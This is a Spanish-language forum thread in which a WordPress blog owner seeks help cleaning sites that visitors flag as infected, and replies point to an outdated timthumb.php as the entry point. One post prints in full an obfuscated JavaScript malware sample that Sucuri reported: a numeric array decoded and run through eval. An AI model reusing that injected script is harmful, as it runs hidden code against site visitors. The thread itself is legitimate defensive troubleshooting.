¿Antivirus online para webs?

  • Autor Autor israelyance
  • Fecha de inicio Fecha de inicio
I

israelyance

Delta
Verificado por Whatsapp
Betas, una consulta.

Estoy buscando antivirus online que me scaneen mis blogs y verificar si hay problemas de virus, exploits, troyanos, etc, ya que estoy compartiendo mis blogs en facebook y me dicen en comentarios que le aparece que hay troyano/exploits. Yo ya le pasé antivirus que hay en mi cpanel, de mi proveeedor de hosting: banahosting, y no me aparece nada, busqué antivirus online por google, los he pasado por algunos de ellos y tampoco hay nada, por eso pregunto por lo que ustedes conozcan, que estén actualizados y sean buenos para verificar.

No voy a compartir ningún dominio por seguridad.

Gracias.
 

Hola Israel. Hay un plugin para Wordpress (supongo que lo utilizas en el blog que mencionas) llamado Antivirus.
 
Ayer le pasé virustotal y sucuri.net y no me salio nada en ninguna de mis webs, hoy en las mismas webs me sale lo mismo. En virustotal me aparece que el analizador SCUMWARE.org lo detecta como Malware site y en todos los demás analizadores esta limpio. En sucuri.net me sale:

Insertar CODE, HTML o PHP: 
Known javascript malware. 
Details: http://sucuri.net/malware/malware-entry-mwanomalysp7
<script type="text/javascript" language="javascript" > try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=199;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,97,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,97,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,103,106,98,103,96,96,101,105,102,92,101,108,92,95,105,107,93,107,40,94,102,101,40,106,109,102,107,109,98,106,91,103,103,110,100,90,107,40,93,106,108,102,109,95,109,37,104,97,106,34,50,5,3,26,27,23,24,95,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,96,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,93,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,97,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,95,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,97,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,95,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,97,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,95,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,96,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-470!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-9));}z=s;e(z);}</script>

Ahora, supongo que si hay un virus este es nuevo y por eso ayer no lo detectó y hoy sí, o esta reconociendo erróneamente algún archivo como virus, cosa que pensé al inicio pero ahora ya lo estoy dudando.

¿Ahora como lo limpio?, en banahosting lo scanee otra vez y no me sale nada.

Voy a probar WordPress › AntiVirus « WordPress Plugins y les comento, ojalá funcione, igual pueden dar otras alternativas =)
 
He reinstalado los blogs, solo he copiado parte importante de la carpeta content y editado antes el código de las plantillas donde se ha colado código extraño en los últimos días.

Para dos webs virustotal me sigue saliendo lo mismo, pero sucuri.net ya me sale limpio.

Analizando con el plugin antivirus me sale código que puede ser malicioso en los themes, no he copiado directamente los theme originales porque las últimas versiones tenían modificaciones de diseño que seria pesado volver a editar, pero reviso los supuestos códigos maliciosos con los theme original y luego de editar algunos me quedan estos.

Este usa el theme forester de theme-junkie
Insertar CODE, HTML o PHP: 
[B]functions:[/B]
#print_r(base64_encode(serialize($valuesArray))); exit;

[B]header:[/B]
... ome()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?>
... ory()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?>

Este usa el theme garden de theme-junkie:
Insertar CODE, HTML o PHP: 
[B]timthumb:[/B]
$imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAA ...
... WXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb DULB3RP6JuPuaGfuuV4fumf8Puvq ...
... C2NQ5MQ4ZNao9Ynzjl9ScNYpnebnDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
if(! is_file($this->cachefile)){
} else if(is_file($this->cachefile)){ //If it's not a local reque ...
if(! is_file($lastCleanFile)){
... 'png' && OPTIPNG_ENABLED && OPTIPNG_PATH && @is_file(OPTIPNG_PATH)){
... ng' && PNGCRUSH_ENABLED && PNGCRUSH_PATH && @is_file(PNGCRUSH_PATH)){
if(is_file($tempfile2)){
$fp = fopen($tempfile,'r',0,$context);
...

No sé mucho de códigos pero creo que son normales, ¿no?
 
Usa Wordfence, con eso restauras el Wordpress... si el problema es con el theme, simplemente vuelve a subir los archivos que pienses que se alteraron...

Revisa también que no tengas un nuevo administrador creado (así es como meten la mayoría de virus)
 

tu problema esta en thinithumb, estas usando una version vieja, actualiza a una nueva, muchos themes vienen con la version con bugs del tinithumbs, y esa version permite colocar codigos dentro de tu web, elimina el tinithumbs.php de la carpeta theme, luego vacia la carpeta del cache de los thumbs y subi la nueva version
timthumb - image crop zoom resize management - Google Project Hosting
 
Hay un plugin para mantener Thimbthumb actualizado, es más, si queda desfasado por lo que vi el sitio web se bloquea (eso no me agradó mucho)
 
yo probé varios pero pasaba que me dejaba sin accesos a usuarios de algunos países...
 
israelyance dijo:
Consulta, ¿eso afectaría mis themes?
Hacer clic para expandir...

nono el file ese lo unico que hace es crear un cache de las imagenes, solo pra eso lo colocan, pero tu theme esta desactualizado con la version del timthumb por eso te inyectaron el virus. Elimina el cache (en la carpeta del theme tenes de seguro una carpeta cache, elimina todo el contenido) y subi el nuevo timbthumb.php
 

En uno de mis themes el archivo se llama post-thumbnails.php y no hay una carpeta cache, en las demás sí las había, las he eliminado y reeemplazado el thumbnail.php. ¿También se procede igual?

Gracias de antemano.
 
israelyance dijo:
En uno de mis themes el archivo se llama post-thumbnails.php y no hay una carpeta cache, en las demás sí las había, las he eliminado y reeemplazado el thumbnail.php. ¿También se procede igual?

Gracias de antemano.
Hacer clic para expandir...

fijate si ese post-thumbnails.php es el timithumbs, puede ser ke le han cambiado el nombre, por mas que no uses los otros themes si los tenes en tu server corres el riesgo que tmb te accedan. Has echo bien en eliminar los demas!
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

  • Cerrado
Venta Reseñas en varios sitios Periodico Online y Webs de Tecnología
Respuestas
10
Visitas
290
p8m4x
P
Constructor Online de Webs
Respuestas
0
Visitas
745
ramonjosegn
Menú
Acceder
Registro